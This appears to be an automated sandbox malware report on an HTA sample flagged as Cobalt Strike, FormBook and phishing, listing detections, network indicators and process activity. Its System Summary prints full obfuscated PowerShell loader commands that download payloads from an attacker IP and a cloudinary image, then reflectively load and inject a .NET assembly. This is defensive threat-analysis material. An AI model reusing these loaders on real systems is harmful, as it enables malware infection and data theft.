Windows Analysis Report
seemybestdayguvenu.hta

Overview

General Information

Sample name: seemybestdayguvenu.hta
Analysis ID: 1570658
MD5: 3af71b8154d01f56072abd20b3a40b1d
SHA1: 81ec9438c1e189024d85c5418b2bdf8a16577ee4
SHA256: dd8410b74d1b3249b8459fea6a43997ad653a8aa2d7aabb02f20076270d34b50
Tags: htauser-abuse_ch
Infos:

Detection

Cobalt Strike, FormBook, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

barindex
Source: http://172.245.123.29/770/seemybestthingswhatdoingforbetter.tIF Avira URL Cloud: Label: malware
Source: seemybestdayguvenu.hta ReversingLabs: Detection: 21%
Source: Yara match File source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2882521949.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2879796460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability

Phishing

barindex
Source: Yara match File source: seemybestdayguvenu.hta, type: SAMPLE
Source: Binary string: q:C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.pdb source: powershell.exe, 00000003.00000002.2242163202.0000000004B09000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2508515611.00000000074E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2511587289.0000000007B4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000C.00000002.2883784931.0000000001280000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000C.00000002.2883784931.0000000001280000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2508515611.00000000074E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2511587289.0000000007B4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2511587289.0000000007B4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: microsoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershe

Software Vulnerabilities

barindex
Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: Network traffic Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.6:49710 -> 172.245.123.29:80
Source: Network traffic Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 172.245.123.29:80 -> 192.168.2.6:49760
Source: Network traffic Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.245.123.29:80 -> 192.168.2.6:49760
Source: global traffic HTTP traffic detected: GET /770/CAMCA.txt HTTP/1.1Host: 172.245.123.29Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: global traffic HTTP traffic detected: GET /770/seemybestthingswhatdoingforbetter.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.123.29Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_02877A18 URLDownloadToFileW, 3_2_02877A18
Source: global traffic HTTP traffic detected: GET /770/seemybestthingswhatdoingforbetter.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.123.29Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /770/CAMCA.txt HTTP/1.1Host: 172.245.123.29Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: res.cloudinary.com
Source: powershell.exe, 00000003.00000002.2242163202.0000000004B09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.29/770/seemyb
Source: powershell.exe, 00000003.00000002.2242163202.0000000004777000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.29/770/seemybestthingswhatdoingforbetter.tIF
Source: powershell.exe, 00000003.00000002.2247720728.0000000007D99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.29/770/seemybestthingswhatdoingforbetter.tIF&
Source: powershell.exe, 00000003.00000002.2243945492.000000000568A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2472476163.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2472476163.00000000050D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2242163202.0000000004777000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.2242163202.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2472476163.0000000004F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2242163202.0000000004777000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.2472476163.00000000050D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2242163202.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2472476163.0000000004F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2242163202.0000000004777000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000008.00000002.2472476163.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2472476163.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2472476163.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.2472476163.00000000050D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2245783194.0000000006DF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/odules/AppvClient/icrosoft.AppV.AppVClientPowerShell
Source: powershell.exe, 00000003.00000002.2243945492.000000000568A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2472476163.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.2472476163.00000000050D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://res.cloudinary.com
Source: powershell.exe, 00000008.00000002.2472476163.00000000050D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
Source: powershell.exe, 00000008.00000002.2472476163.00000000050D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgt

E-Banking Fraud

barindex
Source: Yara match File source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2882521949.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2879796460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $doctor = 'JGJlaSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRhbW9uaWVtaWEgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRxdWFscXVlciA9ICRhbW9uaWVtaWEuRG93bmxvYWREYXRhKCRiZWkpOyRhdGVycmFnZW0gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVhbHF1ZXIpOyRsZWlyaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGFjYXBuYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGlucXVpZXR1ZGUgPSAkYXRlcnJhZ2VtLkluZGV4T2YoJGxlaXJpYSk7JHBlY3RhciA9ICRhdGVycmFnZW0uSW5kZXhPZigkYWNhcG5hKTskaW5xdWlldHVkZSAtZ2UgMCAtYW5kICRwZWN0YXIgLWd0ICRpbnF1aWV0dWRlOyRpbnF1aWV0dWRlICs9ICRsZWlyaWEuTGVuZ3RoOyRjb25kaWNlbnRlID0gJHBlY3RhciAtICRpbnF1aWV0dWRlOyRuaWNvbGF0byA9ICRhdGVycmFnZW0uU3Vic3RyaW5nKCRpbnF1aWV0dWRlLCAkY29uZGljZW50ZSk7JG1hZHJpbGhlaXJhID0gLWpvaW4gKCRuaWNvbGF0by5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkbmljb2xhdG8uTGVuZ3RoKV07JGNyZWR1bGlkYWRlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbWFkcmlsaGVpcmEpOyRyZWRpemltYXIgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjcmVkdWxpZGFkZSk7JHJlYmVsbGFkb3IgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskcmViZWxsYWRvci5JbnZva2UoJG51bGwsIEAoJ3R4dC5BQ01BQy8wNzcvOTIuMzIxLjU0Mi4yNzEvLzpwdHRoJywgJyRyYXBhZG8nLCAnJHJhcGFkbycsICckcmFwYWRvJywgJ2FzcG5ldF9jb21waWxlcicsICckcmFwYWRvJywgJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJzEnLCckcmFwYWRvJykpOw==';$theatrelho = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($doctor));Invoke-Expression $theatrelho
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $doctor = 'JGJlaSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRhbW9uaWVtaWEgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRxdWFscXVlciA9ICRhbW9uaWVtaWEuRG93bmxvYWREYXRhKCRiZWkpOyRhdGVycmFnZW0gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVhbHF1ZXIpOyRsZWlyaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGFjYXBuYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGlucXVpZXR1ZGUgPSAkYXRlcnJhZ2VtLkluZGV4T2YoJGxlaXJpYSk7JHBlY3RhciA9ICRhdGVycmFnZW0uSW5kZXhPZigkYWNhcG5hKTskaW5xdWlldHVkZSAtZ2UgMCAtYW5kICRwZWN0YXIgLWd0ICRpbnF1aWV0dWRlOyRpbnF1aWV0dWRlICs9ICRsZWlyaWEuTGVuZ3RoOyRjb25kaWNlbnRlID0gJHBlY3RhciAtICRpbnF1aWV0dWRlOyRuaWNvbGF0byA9ICRhdGVycmFnZW0uU3Vic3RyaW5nKCRpbnF1aWV0dWRlLCAkY29uZGljZW50ZSk7JG1hZHJpbGhlaXJhID0gLWpvaW4gKCRuaWNvbGF0by5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkbmljb2xhdG8uTGVuZ3RoKV07JGNyZWR1bGlkYWRlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbWFkcmlsaGVpcmEpOyRyZWRpemltYXIgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjcmVkdWxpZGFkZSk7JHJlYmVsbGFkb3IgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskcmViZWxsYWRvci5JbnZva2UoJG51bGwsIEAoJ3R4dC5BQ01BQy8wNzcvOTIuMzIxLjU0Mi4yNzEvLzpwdHRoJywgJyRyYXBhZG8nLCAnJHJhcGFkbycsICckcmFwYWRvJywgJ2FzcG5ldF9jb21waWxlcicsICckcmFwYWRvJywgJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJzEnLCckcmFwYWRvJykpOw==';$theatrelho = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($doctor));Invoke-Expression $theatrelho Jump to behavior
Source: Process Memory Space: powershell.exe PID: 3004, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
